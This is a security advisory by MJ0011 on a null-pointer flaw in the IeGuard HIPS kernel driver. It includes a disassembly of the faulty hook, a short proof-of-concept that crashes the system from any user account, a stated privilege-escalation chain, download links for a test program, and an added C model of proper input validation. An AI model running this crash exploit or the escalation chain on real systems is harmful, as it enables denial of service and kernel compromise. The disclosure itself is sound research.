Author: MJ0011
Source: MJ0011's Kernel Driver Research Lab
The kernel driver shipped with 首页巡警 (IeGuard) v1.1/1.0 contains a serious vulnerability: on a machine with 首页巡警 v1.1 (or v1.0) installed, a user with any privilege level can trigger a system blue screen (BSOD), i.e. a denial of service.
Combined with the SystemCrashDumpInformation driver-loading technique I published earlier, this turns into a local privilege escalation on machines running this HIPS: a user with any privilege level can load a driver into the kernel and execute it. The faulty function is IeGuard.sys!HkZwSetValueKey.
The function's third parameter is PUNICODE_STRING ValueName.
IeGuard performs no check whatsoever on this parameter before evaluating it with RtlCompareUnicodeString; setting the parameter to 0 from ring 3 makes IeGuard crash the system immediately.

Relevant assembly code:
.text:00011430 HkZwSetValueKey proc near                ; DATA XREF: HookKeyRoutine+52 o
.text:00011430                                          ; sub_11B66+45 o
.text:00011430
.text:00011430 StartPageUniName= UNICODE_STRING ptr -14h
.text:00011430 var_C            = dword ptr -0Ch
.text:00011430 Object           = dword ptr -8
.text:00011430 isPass           = byte ptr -1
.text:00011430 Handle           = dword ptr  8
.text:00011430 ValueName        = dword ptr  0Ch
.text:00011430 arg_8            = dword ptr  10h
.text:00011430 arg_C            = dword ptr  14h
.text:00011430 arg_10           = dword ptr  18h
.text:00011430 arg_14           = dword ptr  1Ch
.text:00011430
.text:00011430                  mov      edi, edi
.text:00011432                  push     ebp
.text:00011433                  mov      ebp, esp
.text:00011435                  sub      esp, 14h
.text:00011438                  push     ebx
.text:00011439                  xor      ebx, ebx
.text:0001143B                  mov      [ebp+isPass], bl
.text:0001143E                  call     ds:ExGetPreviousMode
.text:00011444                  cmp      al, 1
.text:00011446                  jnz      loc_114FA
.text:00011446
.text:0001144C                  push     offset str_StartPage ; SourceString
.text:00011451                  lea      eax, [ebp+StartPageUniName]
.text:00011454                  push     eax              ; DestinationString
.text:00011455                  call     ds:RtlInitUnicodeString
.text:0001145B                  push     1                ; CaseInSensitive
.text:0001145D                  push     [ebp+ValueName] ; String2
.text:00011460                  lea      eax, [ebp+StartPageUniName]
.text:00011463                  push     eax              ; String1
.text:00011464                  call     ds:RtlCompareUnicodeString

<-- ValueName is handed to RtlCompareUnicodeString here without any validation, which is what causes the blue screen
.text:0001146A                  test     eax, eax
.text:0001146C                  jnz      loc_114FA
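As an added illustration (not IeGuard's code, nor anything from MJ0011's post), here is a user-mode C model of what the hook should do before calling RtlCompareUnicodeString: check the previous mode, validate the caller's ValueName pointer, copy the header and characters once, and only then compare. ProbeForRead and __try/__except are replaced by plain pointer checks (marked "probe") so the model runs outside the kernel; the function names, result enum and the 64-character limit are assumptions of this example.

```c
#include <stdint.h>
#include <string.h>
#include <wchar.h>
#include <wctype.h>

typedef struct _UNICODE_STRING {
    uint16_t Length;          /* size in bytes, not characters */
    uint16_t MaximumLength;
    wchar_t *Buffer;
} UNICODE_STRING;

enum { KernelMode = 0, UserMode = 1 };            /* ExGetPreviousMode() results */
enum { HOOK_PASS_THROUGH, HOOK_REJECT, HOOK_START_PAGE, HOOK_OTHER_VALUE };

/* Case-insensitive compare against "Start Page", the value name the listing above checks. */
static int is_start_page(const wchar_t *name, size_t chars)
{
    static const wchar_t target[] = L"Start Page";
    size_t i;
    if (chars != wcslen(target)) return 0;
    for (i = 0; i < chars; i++)
        if (towlower(name[i]) != towlower(target[i])) return 0;
    return 1;
}

/* Model of a safe HkZwSetValueKey: validate and copy ValueName before looking at it.
 * In a real driver the two lines marked "probe" are ProbeForRead() calls inside
 * __try/__except; here they are plain pointer checks so the code runs in user mode. */
int hk_zwsetvaluekey_check(int prev_mode, const UNICODE_STRING *value_name)
{
    UNICODE_STRING local; wchar_t copy[64];
    if (prev_mode != UserMode)
        return HOOK_PASS_THROUGH;                 /* kernel callers are trusted */
    if (value_name == NULL || (uintptr_t)value_name % sizeof(void *) != 0)
        return HOOK_REJECT;                       /* probe: catches the NULL the PoC passes */
    local = *value_name;                          /* read the header exactly once */
    if (local.Length % sizeof(wchar_t) != 0 || local.Length > local.MaximumLength)
        return HOOK_REJECT;
    if (local.Length > 0 && local.Buffer == NULL)
        return HOOK_REJECT;                       /* probe: the character buffer */
    if (local.Length > sizeof copy)
        return HOOK_OTHER_VALUE;                  /* too long to be "Start Page" */
    memcpy(copy, local.Buffer, local.Length);     /* never re-read user memory afterwards */
    return is_start_page(copy, local.Length / sizeof(wchar_t)) ? HOOK_START_PAGE : HOOK_OTHER_VALUE;
}

/* Wrap a wide literal in a UNICODE_STRING, as a well-behaved user-mode caller would. */
int check_user_name(const wchar_t *s)
{
    UNICODE_STRING us = { (uint16_t)(wcslen(s) * sizeof(wchar_t)), 0, (wchar_t *)s };
    us.MaximumLength = (uint16_t)(us.Length + sizeof(wchar_t));
    return hk_zwsetvaluekey_check(UserMode, &us);
}
```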

Exploit code (once run, it immediately blue-screens a machine with 首页巡警 installed; it can be executed under any user privilege level):
#include <windows.h>

// ZwSetValueKey takes six stack arguments; pass 0 for all of them so that the
// hook's ValueName parameter is a NULL pointer.
HMODULE hlib = LoadLibraryA("ntdll.dll");
PVOID p = GetProcAddress(hlib, "ZwSetValueKey");
__asm
{
    push 0      ; DataSize
    push 0      ; Data
    push 0      ; Type
    push 0      ; TitleIndex
    push 0      ; ValueName - the NULL that reaches RtlCompareUnicodeString
    push 0      ; KeyHandle
    call p      ; stdcall: the callee removes the arguments
}

Test program download:
http://www.debugman.com/read.php?tid=1330
or:
http://mj0011.ys168.com/ 漏洞演示\IeGuardLeakTest.rar